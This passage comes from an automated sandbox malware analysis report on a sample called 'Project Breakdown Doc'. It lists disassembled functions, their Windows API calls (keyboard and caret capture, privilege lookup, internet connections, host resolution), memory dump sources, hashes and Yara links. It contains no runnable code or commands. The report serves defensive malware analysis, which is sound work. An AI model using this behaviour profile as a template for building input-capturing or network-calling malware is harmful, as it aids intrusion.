                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 250abf352bf9e8937409d27c79923eec3e56093f3966e139c0b639d9be64558a
                                                  • Instruction ID: 46dfc4731836238fe0732d2f60e832ce9046bf2ec5b120f985306a9c1f23330b
                                                  • Opcode Fuzzy Hash: 250abf352bf9e8937409d27c79923eec3e56093f3966e139c0b639d9be64558a
                                                  • Instruction Fuzzy Hash: 20310930A406195EFF208B65C804BFE7BBAAB4A318F1C431BEAA1921D1C3348A559751
                                                  Function 00C76415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C7644B
                                                  • __isleadbyte_l.LIBCMT ref: 00C76479
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C764A7
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C764DD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 514e64dc5cf978216c4101ba4ec9cb8017a3544c4d9d90f1f61b2bb087d402b7
                                                  • Instruction ID: 65e721acb41ffbd00e78e134ef61d51fd3ea6b46436a9e9eca86947d1b707ea8
                                                  • Opcode Fuzzy Hash: 514e64dc5cf978216c4101ba4ec9cb8017a3544c4d9d90f1f61b2bb087d402b7
                                                  • Instruction Fuzzy Hash: 9A31E131600646AFDB21CF75CC44BAA7BA9FF40310F158429F86887190D731DA51DB90
                                                  Function 00CC5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00CC5189
                                                    • Part of subcall function 00CA387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CA3897
                                                    • Part of subcall function 00CA387D: GetCurrentThreadId.KERNEL32 ref: 00CA389E
                                                    • Part of subcall function 00CA387D: AttachThreadInput.USER32(00000000,?,00CA52A7), ref: 00CA38A5
                                                  • GetCaretPos.USER32(?), ref: 00CC519A
                                                  • ClientToScreen.USER32(00000000,?), ref: 00CC51D5
                                                  • GetForegroundWindow.USER32 ref: 00CC51DB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: 6103d2468c67f5c9c99c7c89ad9ec1b384502acc4276886ba54932af7103f952
                                                  • Instruction ID: c415489957fd2a219dc7129d27c6657d9447992d5cae39569ee77689ca2c7593
                                                  • Opcode Fuzzy Hash: 6103d2468c67f5c9c99c7c89ad9ec1b384502acc4276886ba54932af7103f952
                                                  • Instruction Fuzzy Hash: 44311C71900218AFDB00EFA5C885EEFB7F9EF98304F10406AE415E7251EA75AE45DBA1
                                                  Function 00CCC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • GetCursorPos.USER32(?), ref: 00CCC7C2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C7BBFB,?,?,?,?,?), ref: 00CCC7D7
                                                  • GetCursorPos.USER32(?), ref: 00CCC824
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C7BBFB,?,?,?), ref: 00CCC85E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: 49ad2aa8eac1ce043388aa9d6707bdd89daa449edef40fa8029a0bfc0a5a19e3
                                                  • Instruction ID: e5777c79fc8edb2242d41b01b9ab9ca307fc59d67d4dd45890ec24e927353d13
                                                  • Opcode Fuzzy Hash: 49ad2aa8eac1ce043388aa9d6707bdd89daa449edef40fa8029a0bfc0a5a19e3
                                                  • Instruction Fuzzy Hash: D5317E35600118AFCB15CF59C8D8FEB7BBAEB49310F04406DF9198B6A1C7359E61DBA0
                                                  Function 00C60BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __setmode.LIBCMT ref: 00C60BF2
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CA7B20,?,?,00000000), ref: 00C45B8C
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CA7B20,?,?,00000000,?,?), ref: 00C45BB0
                                                  • _fprintf.LIBCMT ref: 00C60C29
                                                  • OutputDebugStringW.KERNEL32(?), ref: 00C96331
                                                    • Part of subcall function 00C64CDA: _flsall.LIBCMT ref: 00C64CF3
                                                  • __setmode.LIBCMT ref: 00C60C5E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                  • String ID:
                                                  • API String ID: 521402451-0
                                                  • Opcode ID: 87f854f1bd7279797345e000586a853ee74b17282cb6dee1a397e169e5055c46
                                                  • Instruction ID: 62fc31054d6695f639c447720d440d76a130d6c0a75b043cea79b51550c28e7d
                                                  • Opcode Fuzzy Hash: 87f854f1bd7279797345e000586a853ee74b17282cb6dee1a397e169e5055c46
                                                  • Instruction Fuzzy Hash: 7511E432904604BBCB29B7B49CC69BF7B69EF45320F24011AF204A72D2EE215D56B7A5
                                                  Function 00C98B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C98652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C98669
                                                    • Part of subcall function 00C98652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C98673
                                                    • Part of subcall function 00C98652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C98682
                                                    • Part of subcall function 00C98652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C98689
                                                    • Part of subcall function 00C98652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C9869F
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C98BEB
                                                  • _memcmp.LIBCMT ref: 00C98C0E
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C98C44
                                                  • HeapFree.KERNEL32(00000000), ref: 00C98C4B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 1592001646-0
                                                  • Opcode ID: 380ed6a6da68c6295d6bc77ba76407f383edad742411dd7918e44922e839355d
                                                  • Instruction ID: 4de59c1945ebd98c24a7c21d0de1f7dcc2e3d60bc55cb26a500e8174d6a05f95
                                                  • Opcode Fuzzy Hash: 380ed6a6da68c6295d6bc77ba76407f383edad742411dd7918e44922e839355d
                                                  • Instruction Fuzzy Hash: 91219C71E01208EFCF10DFA4C948BEEB7B8FF41341F08405AE564A7240DB30AA0ACB60
                                                  Function 00CB1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CB1A97
                                                    • Part of subcall function 00CB1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CB1B40
                                                    • Part of subcall function 00CB1B21: InternetCloseHandle.WININET(00000000), ref: 00CB1BDD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID:
                                                  • API String ID: 1463438336-0
                                                  • Opcode ID: f59901aa4edfdc78dd1199c0a2e741f00934e1ae3a081d32aa1e00490734321d
                                                  • Instruction ID: 29488e162326139ea4c954961170b9c2ed7c30c47886c0642df4315eb673b52a
                                                  • Opcode Fuzzy Hash: f59901aa4edfdc78dd1199c0a2e741f00934e1ae3a081d32aa1e00490734321d
                                                  • Instruction Fuzzy Hash: 3F21CF71200604BFDB119F60CC14FFAB7AEFF48710F58001AFA5196660EB31A921ABA4
                                                  Function 00C9E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C9F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C9E1C4,?,?,?,00C9EFB7,00000000,000000EF,00000119,?,?), ref: 00C9F5BC
                                                    • Part of subcall function 00C9F5AD: lstrcpyW.KERNEL32(00000000,?,?,00C9E1C4,?,?,?,00C9EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C9F5E2
                                                    • Part of subcall function 00C9F5AD: lstrcmpiW.KERNEL32(00000000,?,00C9E1C4,?,?,?,00C9EFB7,00000000,000000EF,00000119,?,?), ref: 00C9F613
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C9EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C9E1DD
                                                  • lstrcpyW.KERNEL32(00000000,?,?,00C9EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C9E203
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C9EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C9E237
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: 5486dc2c8e4137c4e33a737dcd9c0f9011fc85b7caef41d8eeb21758f8d8c7f3
                                                  • Instruction ID: 4e2062fe741df144bf2dc013e2921a2316c20abe4f0dcb47b6b126ce0deae4e8
                                                  • Opcode Fuzzy Hash: 5486dc2c8e4137c4e33a737dcd9c0f9011fc85b7caef41d8eeb21758f8d8c7f3
                                                  • Instruction Fuzzy Hash: 6A11BE36200345EFCF25AF64D849E7A77A9FF84310B44402AF816CB260EB71D951D7A0
                                                  Function 00C75332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00C75351
                                                    • Part of subcall function 00C6594C: __FF_MSGBANNER.LIBCMT ref: 00C65963
                                                    • Part of subcall function 00C6594C: __NMSG_WRITE.LIBCMT ref: 00C6596A
                                                    • Part of subcall function 00C6594C: RtlAllocateHeap.NTDLL(01790000,00000000,00000001,00000000,?,?,?,00C61013,?), ref: 00C6598F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: 03afb873e93ccafce20fe6ed85cea60447c5b1c9214b37eaf4e76417113312d0
                                                  • Instruction ID: 7618cf31878bb90919358933bb502c205bab10925b8c494dcb53b6f6350484b4
                                                  • Opcode Fuzzy Hash: 03afb873e93ccafce20fe6ed85cea60447c5b1c9214b37eaf4e76417113312d0
                                                  • Instruction Fuzzy Hash: 4711A732504A16AFCB312F70EC85B6D3B94AF113A0F14852EF95D961B1DEF58A41A760
                                                  Function 00C44531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C44560
                                                    • Part of subcall function 00C4410D: _memset.LIBCMT ref: 00C4418D
                                                    • Part of subcall function 00C4410D: _wcscpy.LIBCMT ref: 00C441E1
                                                    • Part of subcall function 00C4410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C441F1
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00C445B5
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C445C4
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C7D6CE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  • Opcode ID: 60e7728999a33c15e39006a9accd566450cb9439fb79e1f6333ed65ca22ee66c
                                                  • Instruction ID: fdc36bd85b0a3aa7739f950f8e5dd59d66ced98a4c67d45519a681756493db66
                                                  • Opcode Fuzzy Hash: 60e7728999a33c15e39006a9accd566450cb9439fb79e1f6333ed65ca22ee66c
                                                  • Instruction Fuzzy Hash: FB21D470904784AFEB328B24D855BEBBBFCAF01308F14449EE6AE96281C7745A859B51
                                                  Function 00CB667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CA7B20,?,?,00000000), ref: 00C45B8C
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CA7B20,?,?,00000000,?,?), ref: 00C45BB0
                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00CB66AC
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB66B7
                                                  • _memmove.LIBCMT ref: 00CB66E4
                                                  • inet_ntoa.WSOCK32(?), ref: 00CB66EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                  • String ID:
                                                  • API String ID: 1504782959-0
                                                  • Opcode ID: 16f2a81d8726a6b6f882f0eecae2d10a3d93249ded6921dfe62086bf3895e6d5
                                                  • Instruction ID: 10c758c3f9762e17e387163619624495809fe3bb13f35cd4868e7a9940e4edb3
                                                  • Opcode Fuzzy Hash: 16f2a81d8726a6b6f882f0eecae2d10a3d93249ded6921dfe62086bf3895e6d5
                                                  • Instruction Fuzzy Hash: 67112E75500509AFCF04EBA4DD86EEEB7B9FF54310B148069F506A72A2DF30AE05EB61
                                                  Function 00C99023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C99043
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C99055
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C9906B
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C99086
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 3de57bebe972d5c5c2fa4a3a401e732c26d35130295eee1988521b72219f28e3
                                                  • Instruction ID: e6293f4403d2a8498d98725ebf107f4299813302ccc4f8bb1b1760a2dea1ff24
                                                  • Opcode Fuzzy Hash: 3de57bebe972d5c5c2fa4a3a401e732c26d35130295eee1988521b72219f28e3
                                                  • Instruction Fuzzy Hash: F6113A79901218BFDF10DFA9C984E9DBB74FB48710F204095E914B7250D6726E10DB90
                                                  Function 00C41290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00C412D8
                                                  • GetClientRect.USER32(?,?), ref: 00C7B84B
                                                  • GetCursorPos.USER32(?), ref: 00C7B855
                                                  • ScreenToClient.USER32(?,?), ref: 00C7B860
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                  • String ID:
                                                  • API String ID: 4127811313-0
                                                  • Opcode ID: 5b41047f1822e7c9ffb77b43692737dd071020fc5b9b00548268d0fdd58ec432
                                                  • Instruction ID: 7e2c63f5f0570557a8a349ad36d848d5c1359ecd2d1aedf29b27b6e493df84ce
                                                  • Opcode Fuzzy Hash: 5b41047f1822e7c9ffb77b43692737dd071020fc5b9b00548268d0fdd58ec432
                                                  • Instruction Fuzzy Hash: 2A114C35A00119AFCB10DF94D885EFE77B9FB05300F004456F951E7250D770BA929BA5
                                                  Function 00CA1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CA01FD,?,00CA1250,?,00008000), ref: 00CA166F
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CA01FD,?,00CA1250,?,00008000), ref: 00CA1694
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CA01FD,?,00CA1250,?,00008000), ref: 00CA169E
                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00CA01FD,?,00CA1250,?,00008000), ref: 00CA16D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: 9d84bae7242b53187243860d052c1aa73704c29c6f942efb735e453e0e2425b1
                                                  • Instruction ID: c098e5be04f7b3955a7aafbbc325d0f99452c279b52a85eeed3e37e834ca6d6c
                                                  • Opcode Fuzzy Hash: 9d84bae7242b53187243860d052c1aa73704c29c6f942efb735e453e0e2425b1
                                                  • Instruction Fuzzy Hash: 16112A31C1091EDBCF009FA6D949BEEBB78FF0A755F09405AED40F6240CB3096A18B96
                                                  Function 00C77207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
